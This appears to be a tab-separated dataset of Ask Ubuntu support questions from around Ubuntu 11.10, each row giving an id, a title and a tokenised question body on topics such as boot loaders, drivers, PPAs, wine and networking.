77920	how to remove and reset everything about burg , grub and plymouth	i 'm a newbie to ubuntu , and i 'm using 11.10 . i used super boot manager and boot manager , and i messed a lot with burg , grub and plymouth till that whatever i do there will be no change to burg theme and plymouth theme . so , i removed super boot manager boot manager and reinstalled super boot manager , but it give me an error when i hit install burg button . how to remove and reset everything about burg , grub and plymouth so i can set a theme for them ?
77923	http : //brainstorm.ubuntu.com/ email not working	i 've created a new account on http : //brainstorm.ubuntu.com/ with a correct email . but never received any email with the password . so i can not connect . please tell me how to proceed .
77925	multitouch + scrolling do not work on acer 4741	my laptop is an acer 4741 . it 's running ubuntu 11.10 when i worked on windows 7 , my touch pad had vertical and horizontal scrolling and multi-gesture . both scrolling and multi-gesture are n't working on ubuntu . how can i get it to work ?
77926	run a script on window switch ( on alt-tabbing into/outof a particular app )	i 'd like to run a script whenever i switch into or out of a window . specifically , i have a `` toggle touchpad on/off '' script , which i want to run whenever i switch into or out of gvim . so , is there any kind of hook for that ? even something that can be run whenever alt-tab is detected , as long as it can tell what window you 're going from/to ? i 'm using gnome-shell , if that makes any difference . [ edit ] have started looking into gnome-shell-extensions , which seem to be written in javascript , so might not be too hard to hack one together myself ...
77929	how to run a script ?	i need to install a special patch for vmware . to do this , i downloaded the file and it was the file `` linux '' , a text editor , it looks like this : # ! /bin/sh case `` ` uname-m ` '' in x86_64 ) `` $ 0 '' _64 `` $ @ '' ; ; * ) `` $ 0 '' _32 `` $ @ '' ; ; esac but how do i run it ?
77933	copied files from mac partition to /root . but the /-partition is still full ?	help ! using gksu-nautilus i managed to look at files on my mac partition via as simple right-click . however , at first journaling was still enabled on the mac partition . therefore any copied file would not be copied to where i wanted , but only to the /root directory . i 've noticed that my /-partition is full now . therefore i went into /root and deleted the copied files ( moved them to trash , no terminal ) . but gparted shows me that the /-partition is still full ? ! ! ( in ubuntu i only have the /-partition , /home-partition and swap . )
77935	download folder , not a single file	there was one another question that was the same as mine but the answers were from 2010 , so my question is : how can i download a folder as a whole and not a single file ? i want to download my music folder from another computer . is that in any way possible ?
77950	gpg `` no_pubkey '' errors for libreoffice and mozilla ppas	ever since installing ubuntu 11.10 , i 've been having trouble adding ppas to my software sources . in the past i could add ppas using the usual `` ppa : appname/ppa '' syntax in the software sources and it would automatically retrieve the key from launchpad , etc . now i have to manually add the key using apt-key , and even this sometimes does n't work , as in the case of the libreoffice and mozilla stable ppas . see errors below : w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 83fba1751378b444 w : gpg error : http : //ppa.launchpad.net oneiric release : the following signatures could n't be verified because the public key is not available : no_pubkey 1015216e75198a89 is there a reason why keys do not get automatically retrieved any more ? can i fix this without doing a system reinstall ?
77957	where can i download the apt package if apt-get is missing ?	i am presently experiencing symptoms as described here : https : //bugs.launchpad.net/ubuntu/+source/apt/+bug/493154 example : 127-12:42 djh @ noneedto ~ $ aptitude search chrome aptitude : error while loading shared libraries : libapt-pkg-libc6.10-6.so.4.8 : can not open shared object file : no such file or directory 127-12:46 djh @ noneedto ~ $ apt-get -h the program 'apt-get ' is currently not installed . you can install it by typing : sudo apt-get install apt you will have to enable the component called 'main' so , my thinking , as describe in the bug , is just to download the dpkg for apt . unfortunately , this is not an easy thing to google , because usually when people are looking to know about `` apt '' and `` download '' and `` install '' it is `` how to use apt-get '' ... but wher do i get apt from if it is missing in the first place ? i am running ubuntu 10.04.3 lts ( lucid ) update : per mailq 's answer , the fix here was : wget http : //archive.ubuntu.com/ubuntu/pool/main/a/apt/apt_0.7.9ubuntu17.3_amd64.deb sudo dpkg -i apt_0.7.9ubuntu17.3_amd64.deb if you are fixing this problem , cruise over to http : //archive.ubuntu.com/ubuntu/pool/main/a/apt/ and select a package suitable to your system .
77960	problems related to wine , proshow producer	over the years , i 've installed on my pc different versions of linux , from red hat , mandrake , suse and now ubuntu . every time i 'm a bit disappointed and i 've to go back to windows , as i 'm unable to run under linux , those apps which do usually run without problems under windows . with windows i 've created outputs in form of files.exe , several video using proshow producer by `` photodex '' . the main problem seems to be related to wine and playonlinux . when i try to play a file.exe the file starts with soundtrack , after a while the sound disappears without reason or it happens that the file does n't start at all and the pc crashes or freezes . i 've tried many different versions of wine but the result is always the same , i ca n't get the files.exe to run . help needed . thanks in advance .
77965	unrar failing because of space	i 'm trying to unrar a file ( i have unrar-free package ) . but it 's failed , i think because of files name . file 's ( which in rar archive ) name containing spaces and i ca n't rename it . how can i unrar this file ? note : spaces is n't in archives name , it 's in archived file 's name . for example : this file should be unrared.flv file in test.rar eray @ eray-ubuntu : ~/indirilenler $ unrar terranovas01e06.rar unrar 0.0.1 copyright ( c ) 2004 ben asselstine , jeroen dekkers extracting from /home/eray/indirilenler/terranovas01e06.rar extracting terra nova - 01x06 - bylaw.lol.srt failed 1 failed eray @ eray-ubuntu : ~/indirilenler $
77966	how do i create an encrypted archive containing specific files ?	how do i create a password protected archive containing all the files with the extension conf from /etc ?
77968	can i use hdmi with the intel card of my optimus laptop ?	i have an dell inspiron 7110 that has a sandy bridge i7 and a discrete graphics card ( geforce 525m ) from nvidia . i want to be able to use my 23 ' display at home throungh hdmi but intel integrated graphics card does not work with hdmi ( vga is not an option ) . i have tried bumblebee but it does not work . how could i use the hdmi port for my monitor . using only the nvidia card with some driver is what i tought i could do but i do n't want to give up composing because i use gnome-shell . any options for doing this ?
77973	convert a pen usb to external hard disk	my sat decoder need to have an external hdd to record videos ... if i use my 8gb as pen , it does n't recognize it ! how can i convert to it , to let the decoder work ? it has to be partitioned as ext3 . i found hdd low level format tool for windows , it should work , but i ca n't part it in ext3 using it !
77976	access denied for root user	i can not save my .gih file into /usr/share/gimp/2.0/brushes/ directory . i encounter with `` access denied '' message though i am a root user . what must i do ?
77980	ubuntu gui not loading after installing nvidia graphics card	i am new to ubuntu . i installed ubuntu 11.10 , and downloaded the nvidia geforce 8400 gs graphics card driver from the official site . it was a .run file , and then i entered the tty3 interface ( alt+ctrl+f3 ) and installed the graphics card as a superuser . after that , the normal gui of ubuntu is not coming . i did few restarts , but some lines which says `` starting bluetooth [ ok ] and checking battery status ... [ ok ] '' something like that are displayed , then nothing happens . please tell me what to do . thanks
77982	how to config hotkeys for switching between consoles in ubuntu	by default switching between consoles is evaluated by keys ctrl+alt+fx ( 1-6 ) how to change these hotkeys ? is there any config file for doing this ?
77986	does 11.10 have 'connect to server ' option	does ubuntu 11.10 have 'connect to server ' option as in 10.10 and earlier ? like earlier versions , it does not recognize my nas unit . the earlier versions from 9.04 on needed the samba and nsswitch configuration files editing before they would see the nas unit but would connect from 'connect to server ' under the places menu but this option is missing in 11.10 ( i have skipped 11.04 ) .
77993	how to install with separate home partition ( home partition already created in previous installation ) ?	i have ubuntu 10.10 install on my system with /boot , swap , /root and /home partition . i wish to install 11.10 in my system . in the installation screen the options were : 1 - erase ubuntu 11.04 and reinstall 2 - upgrade ubuntu 11.04 to 11.10 3 - erase everything and reinstall 4 - something else which option should i choose to get benefited ? if i choose the last option should i have to mark the /home partition and if i had n't choose it what should i do now ?
77998	latency occuring between typing the character and printing on screen on a dell inspiron m101z ?	i am facing a bit problem with my laptop dell inspiron m101z and the problem is there is slight latency occurring in typing the text on keyboard and getting up same on the screen . also sometimes i feel that my system is performing slow . my configuration is : - 4gb ram ddr3 320 hardisk amd athlon ii k125
78005	refactoring multiple source codes	how do i add a new line at the beginning of every file i have in a directory ? how do i eliminate useless spaces and tabs at the end of each line of each file in my directory ?
78007	playing next track in rhythmbox by pressing ctrl+shift+pgdn	early i have noticed that there are global hotkeys in rhythmbox ( or may be in sound-menu ) . ctrl+shift+pgdn and ctrl+shift+pgup for next/prev track and ctrl+shift+end for pause/play . i have n't configured them , i 've noticed them accidentally and i was happy = ) than i 've reinstalled my ubuntu ( i 've install the same version of ubuntu ) , and now i do n't have this global hotkeys ? how to bind them ? i ca n't find this config . in system- > keyboard shortcuts there is no option to bind triple hotkeys ( i mean for example ctrl+shift+pgdn , it allows only ctrl+pgdn )
78014	why does clicking install in the software center do nothing ?	i want to install sauerbraten from the ubuntu software centre but when i click install it does not install the game . i 've tried restarting ubuntu and installing other applications but the same thing occurs . when i click install the password entry box does not come up . please help me i want to install applications from the ubuntu software centre .
78017	how to debug a startup script remains active on my desktop with a blinking cursor until logout and re-login ?	when login my desktop a startup script remains in my desktop and blinking cursor ( shape is underline ) left top side on the desktop and when i logout and login again it disappear . how to collect debug information and send bug report for this bug ? is .xsession-errors enough to bug report it ? it reports several errors as these : ( nautilus:2573 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed compiz ( core ) - warn : unhandled configurenotify on 0x1200517 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . ( firefox:3926 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` p\a8\f6 '' after 51 requests ( 51 known processed ) with 0 events remaining . ( gimp-2.7:3306 ) : gimp-core-critical ** : gimp_tagged_get_tags : assertion `gimp_is_tagged ( tagged ) ' failed warn 2011-11-10 21:11:27 glib.glib-gobject < unknown > :0 instance of invalid non-instantiatable type ` ( null ) ' note : child process received `goodbye ' , closing down warn 2011-11-10 21:11:35 glib < unknown > :0 unable to fetch children : method `` children '' with signature `` '' on interface `` org.ayatana.bamf.view '' does n't exist ( nautilus:2573 ) : gdkpixbuf-critical ** : gdk_pixbuf_composite : assertion `dest_y > = 0 & & dest_y + dest_height < = dest- > height ' failed ( nautilus:2573 ) : gdkpixbuf-critical ** : gdk_pixbuf_composite : assertion `dest_y > = 0 & & dest_y + dest_height < = dest- > height ' failed ( nautilus:2573 ) : gdkpixbuf-critical ** : gdk_pixbuf_composite : assertion `dest_y > = 0 & & dest_y + dest_height < = dest- > height ' failed ( nautilus:2573 ) : gdkpixbuf-critical ** : gdk_pixbuf_composite : assertion `dest_y > = 0 & & dest_y + dest_height < = dest- > height ' failed screen geometry changed : 0x0x1920x1080
78018	unity-place-filesearch does n't seem to work	unity place filesearch does not seem to on my computer ( ubuntu 11.10 ) . i have followed these instructions ... sudo add-apt-repository ppa : pydave/unity-lenses sudo apt-get update sudo apt-get install unity-place-filesearch ... the repository adds ok but when i sudo apt-get update , i get ... w : failed to fetch http : //ppa.launchpad.net/pydave/unity-lenses/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found and then when i try to install ... e : unable to locate package unity-place-filesearch any ideas ?
78021	i ca n't configure my dell v515w aio printer	i tried downloading the driver from dell , but their updates only go up to ubuntu 9.04 ... .i do n't know if that is the issue . i downloaded it and unzipped , went to install it then it asked for an administrative password . i entered what i use to log onto ubuntu but it did n't work .
78028	opening syslinux to make a usb bootable ?	i do n't understand how to open and use syslinux so that it can create a bootable usb . i am not familiar with a lot of the language on the standard answers , so less tech is better . i downloaded version 3.11 and opened and extracted it with bitzipper : that works . the procedure i am trying to follow says this : '' download syslinux-this is a utility that will make the fat32 partition of your usb stick bootable . with the windows command prompt , cd over to the `` win32 '' subdirectory of the syslinux directory you downloaded and type the following , where `` f : '' is the drive letter for the type11 partition on your usb stick : syslinux -ma f : '' i ca n't find a win32 subdirectory , and i ca n't get the syslinux.exe file to run . is there a different version of syslinux i need to find ? thanks , dm
78032	is it possible to install a 64-bit version of wine to run photoshop cs5 x64 ?	i 'm trying to get a 64bit version of photoshop to work on ubuntu 11.10 . the problem is that wine comes as 32 bit by default and i can only use the 32bit version of photoshop . is it possible to install wine64 and have a 64 bit version of photoshop working under linux ? has anyone done this before that could give some insight ? thanks !
78034	mouse pointer does not change appearance	i am using oneiric with unity installed in a netbook and in a desktop . in both the machines i have this problem : when i click on a quick-launcher icon the mouse pointer , when the program is starting , does not change the appearance from the arrow to the `` rotating clock '' for telling me that the machine is working . so , specially for the netbook , i have to wait much time before i could understand if it is really working or not . may i do something to make it working like the previous releases ? ( in 11.04 i used the classical view )
78035	unity interface issues with amd radeon 6450	is the amd radeon 6450 blacklisted for 11.04 ? i get an error message saying my hardware is not compatible for unity . i have an i5-processor , dl-67 intel motherboard,4 gb ram , and 1 gb radeon 6450 graphics ... ( new to linux ! )
78041	ppa shows up under `` all software '' that is no longer enabled	i used to use the aurora builds of firefox , but now i 've uninstalled firefox and gone back to chromium . i 've removed the ppa , but it still shows up under `` all software '' in the ubuntu software center , when i click on the arrow to the side of it to display my ppas . i 've checked the software sources to see if there 's anything leftover , and there 's nothing . i use y ppa manager , and there 's nothing there to remove as well . how do i get rid of it ?
78042	banshee intelligent playlist including subfolders	is it possible to create intelligent/smart playlist of folder `` 2011 '' with all it 's subfolders ? i 've tried to do this , but banshee 2.2.1 seems not to go deeper for music files than to the specified folder .
78043	sudo tar cvpzf exiting with failure due to previous error	i looked at the other question addressing this issue but i think i might have a different setup . i too am trying to backup my ubuntu machine , but here is the difference . i used wubi to install ubuntu 11.10 alongside vista on my laptop . i have spent considerable time getting to this point in the setup that i decided that it was probably a good bet to back it all up to my external hard-drive . so from various sources i gathered this : first i navigated to my external hard-drive then i created a backup folder on this drive and then i entered the following from the terminal : sudo tar cvpzf mybackup.tgz2 -- exclude= '' /host/* '' -- exclude= '' /media/* '' -- exclude= '' /mnt/* '' -- exclude= '' /proc/* '' -- exclude= '' /tmp/* '' / and the process ran for about 20 minutes when it finally kicked out with the exiting message . i did notice the there were some read errors early on ... . but it carried on processing ... then it had three 'files changes as we were reading ' and 3 to 4 minutes later it exited . anyone have suggestions as what i can do to get this backup ? thanks , railguage48 after running the backup now only with sudo tar cpf and all the previous exclusions plus adding -- exclude= '' /dev/ '' i got these error : tar : removing '/ ' from front of names tar : /sys/module/bnep/sections/__mount_loc : file sharnk by 4085 bytes ; padding with zeroes … . a whole bunch of these the paths are different tar : /home/tom/.gvfs : can not stat : permission denied tar : /run/synaptic.socket : socket ignored … . 8 of these different folders tar : /var/lib/citadel/data : file changes as we read it … . 5 of these different folders hopefully someone understands what is happening because i am a little alarmed that i have these errors ... thanks for any help or suggestions . railguage48
78045	black screen after waking up from suspend	running 11.10 and on wake up after being suspended ( for a long time or 2 seconds , does n't matter ) i am presented with a black screen that just has a purple bar ( about the size of the top menu bar ) . as far as i can tell the system is unresponsive to anything outside of a manual restart by pressing the power button on the tower , after which it starts normally . using the most up to date graphics driver , also tried switching to a different version , nothing .
78048	xdg-open file.cbz opens nautilus ?	i 'm using calibre and it seems that it uses xdg-open to open files . this , even when tried in terminal , only opens nautilus and the file is selected , but not opened . it does n't matter if i try to open .cbz or .pdf . this seems fine : /usr/share/applications/defaults.list application/x-cbr=evince.desktop application/x-cbz=evince.desktop sure when i open the file in nautilus it opens , but this approach is quite annoying .
78049	will i be prone to viruses ?	i replaced windows because of the viruses and such . i was wondering if i had to worry much about them with ubuntu .
78050	i want to host webserver befind wi-fi router which is using static ip .	before purchasing dedicated server i want to hone my skills . therefore i want to install ubuntu on my desktop which is connected to wi-fi router . i am using static ip provided by my isp . the cable modem is connected to router . all my laptops get dynamic ip from router . i want to connect to my dedicated server located at my home , from my office also . i am confused as to which ip i should use for dns . how can i access a machine which is using wi-fi router for internet connection . please guide me .
78052	how do i setup dual monitors with workspace on only one monitor ?	i have dual monitors , one on the left and another on the right . i like to have vmware workstation opn the right hand monitor , full screen . in gnome3 , when i switch workspaces the right side monitor keeps the same program open and workplace switching only affects the left side monitor . how can i do the same thing in unity on ubuntu 11.10 ?
78053	how do i disable the nvidia gpu on a dell vostro 3500 ?	ubuntu website stipulates that dell vostro 3500 is a certified laptop with a condition that only integrated intel gpu is used . i installed ubuntu 11.10 and it seems to be using nvidia but not the integrated gpu . although nvidia seems to be working ( i am using the latest nvidia drivers from their website ) i would still prefer to revert to intel gpu due to lower power consumption . could someone advise me the best way to do so ? i am not an experienced linux user and would appreciate if one could give me detailed instructions . thank you in advance , guys !
78055	ruined music collection with banshee	you know the option in banshee to change the whole folder structure of your music collection according to the meta date ? i enabled that . problem was that it only seemed to change it from the moment you opened the `` change track info '' dialog and hit the save button . i was n't planning to do that for my whole collection , so i looked for an easier solution . i selected the whole collection ( ctrl+a ) , and went to `` change track info '' . there my eyes fell on a button labeled something like `` synchronize all '' ( i guess the translation was just unclear ) , and it seemed to me that that would do what i was searching for ... it did n't . in stead , it applied the same artist id3 tag to my whole music collection , and because of the option for changing the folder structure enabled , it changed the filename for all of those songs too . so i 've got a bit of a problem here ... the only things still intact is the title and album of the song ( title 's also in the filename itself ) . but the artist has been set to the same for every song . so , my question : is there a way to rollback the changes ? or is my music collection permanently ruined ? i have n't got my hopes up very high , but i figured it 's better to ask than to just deleting everything .
78056	how do i make fn+f2/f3 change the brightness on my hp dv7-6135dx ?	the problem described below riddled me for quite a while and could n't find a straight forward answer anywhere online . i have found a solution and i would like to use this post as a documentation record . issue when i press the key combinations fn+f2 or fn+f3 the popup indicating the the key combination was pressed shows up and the bar fills/empties correspondingly . however , the brightness of the screen remains the same .
78069	unable to access server web pages from internet ?	i 'm new to ubuntu server , which i have install ( 10.04 ) . my server is connected to my belkin router , which in turn is connected to my cisco linksys spa2102 voip phone adapter/router . i can asscess my webpages on my server ( apache2 installed ) thru my home network . but , i can not access the webpages from the internet outside of my home . i need simple step by step instructions to help me . i have install most required software ( openssh , php5 , mysql , and winscp ) .
78070	problem with gadmin-rsync and cron ( d )	i 'm trying to get the schedule for gadmin-rsync working on ubuntu 11.10 . when i try to save schedule options , i get an information window which states : error : the time schedule server `` cron ( d ) '' does not seem to be runing . when i do a ps aux | grep cron , i get this : root 876 0.0 0.1 18976 944 ? ss 19:48 0:00 cron so , i assume cron is actually running . my gadmin-rsync version is 0.1.7 everything else about gadmin-rsync works properly . any advice on what i should try next ? thanks !
78074	can not install ubuntu on acer aspire m3970	i can not install ubuntu 11.04 or 11.10 32 or 64 bit from cd or usb drive on my machine . i tried to unplug all devices connected to usb , no changes the same thing : [ 15.383691 ] sd 7:0:0:3 : [ sdg ] attached scsi removeable disk . and then the installation or live image booting does nothing more ... its quite annoying that ubuntu run on every of my machines but not on my new pc : ( what can i do to get that running ? edit : fascinating thing i found out , is that the 10.04 lts seems to work in every way . why does 11.04 or 11.10 does not ... maybe theres a bug in the installer ?
78076	how to replace my disk without having to rebuild my ubuntu install ?	i 'd like to buy a new 1tb disk to replace my old 150gb disk . is there an easy way to copy my ubuntu installation , with my home folder content , system settings , applications , and so on , so at the end i can just unplug my old disk and use the new one without having to re-install everything ?
78087	epsxe or psx do not work	epsxe is my favor emulator . it does not work in ubuntu 11.10 . it ask me for libgtk1.2 and i cant find it within 11.10 ? psx told me that : ( psx:6367 ) : glib-gobject-critical ** : g_signal_handler_disconnect : assertion `g_type_check_instance ( instance ) ' failed [ src/linux/sound.cpp , line 215 ] : 'snd_pcm_hw_params_set_access ( pcm_handle , hwparams , snd_pcm_access_mmap_interleaved ) ' returned 'invalid argument' pad=0 i have no idea about that . it there anyone can help ? why removing libgtk1.2 ? ? ?
78088	can i apply a different gtk3 theme from the main one to an individual application ?	for example , can i keep ambiance as main theme but assign elementary theme to elementary 's app ?
78090	how do i replace mythbuntu with 11.04 w/o trashing sw raid	i have a mythubuntu server with a 14tb sw raid setup . i am finding myth too finicky and would like to go to a vanilla ubuntu install . can someone direct me on the best way to approach this without trashing my raid setup . i have a separate boot drive but am hesitant to proceed due to my newbie status and lack of experience with the raid aspects of the server . other than the fact i do n't use any of the myth features , the biggest problem i am having with the myth setup is the one thing i do use and need - a samba share- will intermittently `` disappear '' from my network even though i have full network connectivity . it will mysteriously drop from the network and just as mysteriously show up anywhere from 10 minutes to 3 days later . this server has been operating for almost 2 years and just recently started acting screwy . no interaction , including rebooting , uninstalling/reinstalling samba , recreating a new/replacement share , etc. , seems to make any difference with these mystery actions . i have replaced the network card , ensured all updates are installed , and no one is interacting with the server when it disappears/reappears . i have 4 other ubuntu servers and this is the only one having problems .
78091	why do bad requests take so long ?	i noticed this is other oses as well , but most visibly in ubuntu linux . whenever a good request is made , it is computed practically instantly . however , whenever a bad request is made ( a bad password , a non-existent command , etc ) it takes a few seconds before it lets me try to give input again . is this some kind of security measure ?
78092	problem with mysql extension	i installed apache2 , php , php5-mysql and mysql-server . when i type http : //localhost then everything is ok . but when i type http : //localhost/wordpress then this message appears : your php installation appears to be missing the mysql extension which is required by wordpress . what to do to install mysql extension ? i thought that i already did it installing php5-mysql .
78095	grub - elf magic error message after installation - how to get dual boot option ?	i attempted to install ubuntu alongside windows 7 . ( intel i5 2300 h67 chipset ) unfortunately , after a seemingly successful installation i got the message : grub : âinvalid arch independent elf magicâ grub rescue > another answer here suggests i should enter these commands below , which should be customised for my own partitions . sudo apt-get install grub-efi-amd64 sudo mount /dev/sda3 /mnt sudo mount /dev/sda1 /mnt/boot sudo grub-install -- root-directory=/mnt /dev/sda my partitions are ... device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 819202047 409497600 7 hpfs/ntfs/exfat /dev/sda3 819202048 1228802047 204800000 7 hpfs/ntfs/exfat /dev/sda4 1228804094 1953523711 362359809 5 extended /dev/sda5 1228804096 1936926719 354061312 83 linux /dev/sda6 1936928768 1953523711 8297472 82 linux swap / solaris however , i 'm a bit unsure how i can adapt those commands above because i want to be able to dual-boot with windows 7 . ( if those commands are appropriate for me anyway ) . given my partitions above , how can i get grub to give me a dual boot option ? thanks
78098	how to chroot into persistent installation ?	to chroot into 'normal ' installation requires just mount of common / , /proc , /sys and /dev to do normal administration tasks . but how to proceed with so called 'persistent ' installation ( see here ) ? how to simulate 'persistent ' parameter on boot process ( how does the system handle this issue ) ? this question is perhaps related to how do i recover my username and password on a persistent liveusb ? ( i do not have a specific problem to solve , i am just interested in . )
78103	how do i completly remove software ?	ok i have 8gb on my desktop dual booting win 7 . i installed a few games , assualtcube , tremolous , and spring . but i had removed them using 'remove -- purge ' and only to find they are still lingering and purge does not well truly purge them . i need them completely gone and not secretly hogging space when i purged them . how can i completely remove software , like it is gone and not going to take any more of my precious space ? shrinking 7 and growing ubuntu is not an answer i am accepting , i want to know how to completely remove software . thank you for your time and your answers .
78105	how to get hdmi video out to work with ati radeon hd mobility ?	i have an ati radeon hd mobility 5400 series , and i believe i am running the open source driver . currently , vga out works fine for running an external monitor . hdmi out does not work at all . xrandr does not even list an hdmi output . i really appreciate the help . thank you .
78110	what is somthing simple you would like to have on ubuntu ?	i would like to make something in python and release it on a ppa or sourceforge but i dont know what i want to make can someone help me but it cant be somthing super challenging just like intermediate or begginer maybe .
78115	help set up atheros ar242x/ar542x wireless adapter	i googled the problem and found this link : http : //sage.bt/tips/get-atheros-ar242x-ar542x-wireless-card-to-work-on-ubuntu.html unfortunately when i input the command into the terminal i get this message : bash : /etc/modprobe.d/blacklist.conf : permission denied i do n't know of any alternative solutions , but advice is appreciated .
78116	where is the »open as administrator« option in nautilus gone ?	till ubuntu 11.10 there the context or edit menu had an option to open a specific folder as administrator . this option came with the package nautilus-gksu . now it vanished . does anybody know how to get it back ?
78117	what to do with my `` unmounted drive '' ?	i just recently followed the tutorials on http : //www.ubuntu.com/download/ubuntu/download for installing the ubuntu server onto my 1tb seagate external . i was planning on using this to install it on my macbook and in these instructions it states to preform this line of code run diskutil unmountdisk /dev/diskn ( replace n with the disk number from the last command ; in the previous example , n would be 2 ) now my hd prompts `` the disk you inserted was not readable by this computer '' . would i just run diskutil mountdisk /dev/diskn in order to be able to access all my files again ? here is a screenshot to the instructions i followed http : //i17.photobucket.com/albums/b97/hello_screamo/screenshot2011-11-11at113914am.png
78119	bluetooth manager tools	what bluetooth tools are available in ubuntu to configure a bluetooth device . for example changing the frequency it uses , detecting and showing all bluetooth devices connected to the pc and any other settings that will help configure a bluetooth device . for the moment i have 2 wireless bluetooth mice , 1 bluetooth keyboard and one bluetooth dongle so that other cellphones can connect to it and share mp3 , images and other phone stuff . dmesg tells me when i connect the mice and keyboard and they were detected and configure but there is no gui applicacion to manage them and configure maybe some additional settings . the only bluetooth device i can actually configure is the dongle to connect to a cellphones . is there any bluetooth managers ( gui based but terminal would work also ) that i can use to configure the mice , keyboard and any other bluetooth devices ?
78121	which is a better laptop for 11.10 : dell precision m6600 or macbook pro 17-inch ?	the company i work for is going to buy me a new laptop before the end of the year . right now i use ubuntu 11.04 on a ~3.5 year old dell vostro 1700 . it 's a dual boot install and it runs good enough , but it 's not perfect . i attribute most problems i experience to the age/wear of the laptop , not ubuntu . i 'm going to do a full install on whatever laptop i buy next , so no windows or os x at all , only ubuntu . i 'm looking at a dell precision m6600 and also at a macbook pro 17-inch . work is paying for the machine , so thankfully price is not a concern . i just want ubuntu to run flawlessly . i use ubuntu because it makes me so much more efficient at my job ( web development , etc. ) . i do n't customize the os much and i 'm not messing around too much behind the scenes . i just want ubuntu to run as smoothly and reliably as possible . is one of these two machines - dell m6600 or macbook pro 17 '' - better suited for ubuntu than the other ? if i 'm not using windows or os x that comes w/ the machine am i losing a lot of the performance gains from the hardware , or can ubuntu take full advantage of all the specs ? note : i have only been using linux regularly for under a year . my knowledge of video cards , chips and other hardware and specs ( and how they relate to ubuntu ) is somewhat limited .
78125	transparent see-through terminal and windows key	i just upgraded to ubuntu 11.10 and i 'm having a couple of issues that i did n't have with # 10 . first of all , when the terminal is transparent , it shows the desktop rather than the window behind it . being able to read the window behind the terminal at the same time was a really useful feature of the transparency , but now it 's just showing the desktop instead . second of all , the windows key seems to be ignored . i mostly use it for `` windows-d , '' which shows the desktop . is there another such shortcut or a way to disable the windows key ? i also switched back to the gnome classic view . i like it a lot better than the new view , but the new view had a way to quickly search files and applications based on the name . where is this in gnome classic ?
78136	how to comply with this guideline for submitting an application to the software center ?	i was reading through the ubuntu developer programme agreement for submitting applications to the software center and stubled across the following clause : 3.1 you must first test apps you submit to confirm they are compatible with all currently supported versions of ubuntu ( as listed on canonical 's website at the date of submission by you ) and your apps must comply with the publishing policy . does this mean i must install both the 32 and 64 bit versions of ubuntu 8.04 , 10.04 , 10.10 , 11.04 , and 11.10 ? if so , that 's 10 installations of ubuntu - is that really feasible ( even with virtual machines ) ? alternatively , does anyone have suggestions for testing the application without actually installing each version ? some sort of chroot tool , perhaps ? edit : i have begun setting up chroot environments for compiling and testing the applications . is this considered testing and therefore satisfies the requirements of the license agreement ?
78145	gnome shell - battery only charges to about 90-91 %	in gnome shell , i am charging my battery but it wo n't go past 91 % at the most . it sometimes gets stuck at 90 as well . its very annoying and i want to know if there is a fix for this ...
78146	deleted 2 20gb zips , no space freed up	recently deleted 2 20gb gzip files from my ubuntu . they did not appear in the trash , and 40gb of disk space remains used . i searched all trash folders and they are empty . the files that were deleted do not show anywhere either . how do i reclaim this 40gb ?
78153	usb cd plug n play auto detect and mount not working	well i just installed ubuntu 11.10 and after some time ( i dont know what i did ) the auto detect /mount of my usb drives / cd stopped working . earlier when i used to plug my usb drive in , its icon used to show on the desktop . i tried lsusb , and there it was user1 @ xxzr : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0bc2:5021 seagate rss llc freeagent goflex 9dere1-500 1.5 tb how can i get it to the desktop automatically ? ? ?
78163	when sending email with postfix , how can i hide the sender’s ip and username in the received header ?	when sending mail , postfix inserts the authenticated user’s ip and username into the received header on the email . while this is useful for tracking down who sent a particular email that was sent from your mail server , it also has privacy implications . in a small-scale situation where i can trust all the users not to get their accounts compromised and turned into spam zombies , i’d rather not broadcast ip addresses and account names for all to read . in short , how do i set up postfix to not send this : received : from [ x.x.x.x ] ( pc1.example.com [ x.x.x.x ] ) ( using tlsv1 with cipher dhe-rsa-aes256-sha ( 256/256 bits ) ) ( no client certificate requested ) ( authenticated sender : user ) by mail.example.com ( postfix ) with esmtpsa id cc77010c148 for ; fri , 11 nov 2011 04:55:18 +0000 ( utc )
78164	configuring tata photon + usb modem huawei ec156	the version that i have now on my machine is ubuntu 11.10 desktop dual booted with windows xp . the problem that i face is that i have a usb modem of huawei model no : ec 156 . it 's a tata photon + modem ( for fellow indian readers ) . when i plug that device into a usb port , it 's supposed to autoplay and take me to the installer which would install the drivers and the dialer ( that 's what the customer care of tata photon + has told me ) . but , it does n't autoplay or install anything . but , the network manager detects the device . i tried setting it up from the network manager . the connection is set up but it does n't connect to the network . there 's no error message or anything ( it just says than i am not connected to the network ) . i read the ask ubuntu threads and tried to install the following drivers : usb modeswitch usb modswitch data but , those two did n't install from the ubuntu software center .
78170	how to specify a not listed application in nautilus ' »open with« dialogue	back in nautilus 2 when using the »open with« dialogue there was always a field to specify manually a command to open the file . where is it in nautilus 3 ? how can i use it now to open a file with my scripts or with application not providing a desktop-file like vim , emacs or something else ? please do n't tell me i have to create desktop-files for these scripts or applications to do so !
78174	play sound through two or more outputs/devices	i think this is a pretty simple concept . i have one sound card and one pair of bluetooth headphones . i want to play my audio through both my sound card and my bluetooth headphones . i believe windows has checkboxes allows you to `` check '' outputs to enable/disable them , but ubuntu seemingly has the equivalent of radio selectors ( you can only select one at a time ) . bonus question : on a similar note , i have 5 analog output channels on my sound card ( in addition to my digital & hdmi audio ) -- i would like to be able to determine what comes out of each of those ports ( e.g . `` front speakers '' on all 5 or `` front '' , `` center '' , `` back '' , etc ) . thanks in advance !
78178	move the navigation buttons in nautilus to the left in ubuntu 11.10 ?	can the `` navigation buttons '' in nautilus 3 be moved to the left ( forward and back ) . i just find them impractical and confusing on the right . this is nautilus looks by default : i would like to move the forward and back buttons to the left of the `` location bar '' . the search button could be left there . is it possible ?
